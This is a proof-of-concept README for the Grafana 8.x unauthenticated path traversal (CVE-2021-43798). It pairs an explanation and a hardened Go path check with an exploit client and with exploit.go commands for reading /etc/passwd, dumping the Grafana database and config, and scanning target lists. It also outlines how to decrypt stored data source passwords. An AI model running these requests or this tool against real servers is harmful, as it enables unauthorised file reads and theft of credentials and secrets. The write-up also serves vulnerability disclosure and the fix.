PoC for Grafana 8.x Local File Inclusion (Pre-Auth)

CVE: Pending at the time of writing (later assigned CVE-2021-43798; fixed in Grafana 8.3.1)

All credits go to j0v and his tweet https://twitter.com/j0v0x0/status/1466845212626542607

Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

In good faith, I've held back releasing this PoC until either this vulnerability is public or a patch is available.

Explanation

I noticed a tweet by j0v claiming to have found a Grafana path traversal bug. Out of curiosity, I started looking at the Grafana source code. The tweet mentioned it was a pre-auth bug. Grafana exposes only a handful of unauthenticated routes, and only one of them takes a file path from the user.

Grafana has an unauthenticated route, /public/plugins/:pluginId/*, that serves a plugin's static assets. A request names a valid :pluginId and then the asset path, such as img/logo.png. Grafana joins the user-supplied path onto the plugin directory without checking that the result stays inside it, so a path made of ../ segments walks out of the directory: a classic path traversal giving an arbitrary file read as the grafana user.

For a core panel plugin the directory being served is <grafana>/public/app/plugins/panel/<pluginId>. On a standard package installation the Grafana home directory is /usr/share/grafana, so the plugin directory for alertlist is /usr/share/grafana/public/app/plugins/panel/alertlist, eight components deep. Eight ../ segments therefore reach the filesystem root, and anything after them is resolved as an absolute path.

HTTP Request:

GET http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

Offending Code: https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284
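To make the bug concrete, here is an added example (my own code, not Grafana's; the constant and function names are made up for illustration) of the clean-and-join pattern that lets a request escape the plugin directory, next to a version that rejects it with a containment check:

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// pluginDir is where a core panel plugin's assets live on a package install
// (hypothetical constant for this example; layout as described above).
const pluginDir = "/usr/share/grafana/public/app/plugins/panel/alertlist"

var errTraversal = errors.New("requested path escapes the plugin directory")

// vulnerableResolve shows the pattern behind the bug: the remainder of the
// URL is cleaned and joined onto the plugin directory. filepath.Clean keeps
// leading "../" segments, and filepath.Join then resolves them against the
// base, so the result can point anywhere on the filesystem.
func vulnerableResolve(base, requested string) string {
	return filepath.Join(base, filepath.Clean(requested))
}

// safeResolve does the same join but refuses any result outside base. The
// check is made on the joined path with filepath.Rel rather than with a
// string-prefix test, which would wrongly accept a sibling directory such
// as ".../panel/alertlist2/".
func safeResolve(base, requested string) (string, error) {
	full := filepath.Join(base, filepath.Clean(requested))
	rel, err := filepath.Rel(base, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errTraversal
	}
	return full, nil
}

// traversal builds the user-controlled part of the URL: depth "../" segments
// followed by the absolute file to read, with its leading "/" dropped.
func traversal(depth int, file string) string {
	return strings.Repeat("../", depth) + strings.TrimPrefix(file, "/")
}

func main() {
	// Eight levels matches the /usr/share/grafana layout described above.
	for _, req := range []string{"img/logo.png", traversal(8, "/etc/passwd")} {
		fmt.Printf("request %q\n", req)
		fmt.Printf("  vulnerable -> %s\n", vulnerableResolve(pluginDir, req))
		if p, err := safeResolve(pluginDir, req); err != nil {
			fmt.Printf("  hardened   -> rejected (%v)\n", err)
		} else {
			fmt.Printf("  hardened   -> %s\n", p)
		}
	}
}
```

The depth only matters for the vulnerable version: extra ../ segments past the root are harmless, so an exploit that does not know the install path can simply use more of them.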

Note: Typing this URL into a browser or plain curl does not work, because both collapse the ../ segments client-side (RFC 3986 dot-segment removal) and send a request for /etc/passwd, which 404s. curl can be told to send the path unmodified with its --path-as-is flag, which is enough to check whether an instance is vulnerable without any extra tooling; exploit.go works because Go's HTTP client does not normalise the path.
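Added example, not part of the original PoC: a client that sends the traversal path unmodified, next to a throwaway test server that echoes back the path it actually received, so the behaviour can be observed offline. Go's net/http client performs no dot-segment removal, which is why exploit.go works where a browser or default curl does not. Function names are my own.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// traversalURL builds the plugin-asset URL the exploit requests: the
// unauthenticated route, depth "../" segments and the file to read.
func traversalURL(target, pluginID string, depth int, file string) (string, error) {
	u, err := url.Parse(target)
	if err != nil {
		return "", err
	}
	u.Path = "/public/plugins/" + pluginID + "/" + strings.Repeat("../", depth) + strings.TrimPrefix(file, "/")
	return u.String(), nil
}

// fetch issues the GET and returns the status and body. Go's client writes
// the path into the request line as given (no dot-segment removal), so the
// "../" segments reach the server, equivalent to curl --path-as-is.
func fetch(client *http.Client, rawURL string) (int, []byte, error) {
	req, err := http.NewRequest(http.MethodGet, rawURL, nil)
	if err != nil {
		return 0, nil, err
	}
	resp, err := client.Do(req)
	if err != nil {
		return 0, nil, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return resp.StatusCode, body, err
}

// echoServer stands in for a target and replies with the raw path it was
// asked for. A bare handler (no ServeMux) sees the path exactly as sent.
func echoServer() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, r.URL.Path)
	}))
}

func main() {
	srv := echoServer()
	defer srv.Close()
	u, err := traversalURL(srv.URL, "alertlist", 8, "/etc/passwd")
	if err != nil {
		panic(err)
	}
	status, body, err := fetch(srv.Client(), u)
	if err != nil {
		panic(err)
	}
	fmt.Printf("sent:     %s\nreceived: %s (HTTP %d)\n", u, body, status)
}
```

Against a real target, replace srv.URL with the Grafana base URL and read the body: on a vulnerable 8.x instance it is the file content; a patched instance returns an error status.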

Attack Vectors

These are some attacks that can be carried out with this file read.

Dumping Sqlite Database

Grafana, by default, uses a sqlite3 database. On package and Docker installs it is stored at /var/lib/grafana/grafana.db (the path setting in the [database] section can move it). You can use the exploit.go script to dump this database.

Example:

go run exploit.go -target http://localhost:3000 -dump-database -output grafana.db

You can then read this database to obtain users, auth tokens, and data sources.

Dumping defaults.ini Config File

Grafana ships its default configuration in <grafana>/conf/defaults.ini. Interesting values include secret_key and, if MySQL or Postgres is used instead of sqlite3, the database host, user and password in the [database] section. Bear in mind that defaults.ini holds only the shipped defaults: anything an operator overrides in grafana.ini (/etc/grafana/grafana.ini on package installs), custom.ini or GF_* environment variables is not reflected there, so dump those files too when they exist.

Example:

go run exploit.go -target http://localhost:3000 -dump-config -output defaults.ini

Reference: https://grafana.com/docs/grafana/latest/administration/configuration/

Decrypting Datasource Passwords

Grafana encrypts data source secrets with AES-256 in CFB mode, using a key derived from secret_key in the config file (PBKDF2-HMAC-SHA256 with a random 8-byte salt that is stored in front of the ciphertext, followed by the 16-byte IV). We can dump the config file, as shown above, and then decrypt the values from the database. If secret_key is still the shipped default, no config dump is even needed; if it was overridden in grafana.ini or via GF_SECURITY_SECRET_KEY, the value in defaults.ini is useless and the override must be read instead.

Reference: https://grafana.com/docs/grafana/latest/administration/configuration/#secret_key

Session Takeover

Grafana stores session tokens in the user_auth_token table, but not in usable form: the auth_token column holds a SHA-256 hash of the cookie value salted with secret_key, so the dump does not hand you a session cookie directly. I haven't been able to take over a session, but if you read the source code, you could figure it out.

Exploit Script

Example

root@localhost:/# go run exploit.go -target http://localhost:3000 -file /etc/passwd
Grafana 8.x Local File Inclusion (Pre-Auth)
Made by Tay (https://github.com/taythebot)

[INFO] Exploiting target http://localhost:3000
[INFO] Successfully exploited target http://localhost:3000
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:Linux User,,,:/home/grafana:/sbin/nologin

Single Target

go run exploit.go -target <target> -file <path>

Output to file

go run exploit.go -target <target> -file <path> -output <file>

Note: -output cannot be combined with -list (multiple targets).

Multiple Targets

go run exploit.go -list <list> -file <path>

Dump defaults.ini

go run exploit.go -target <target> -dump-config

Dump sqlite3 database

go run exploit.go -target <target> -dump-database

Build

make build

Owner

Tay
Comments

Add instructions for POC with curl

I figured out why this couldn't be tested using a browser or curl: they both automatically collapse instances of ../ in the path.

But there is an easy way to test this with curl using the --path-as-is argument. I updated the note with this example so it's easy to check whether an instance is vulnerable without having to use an extra tool.
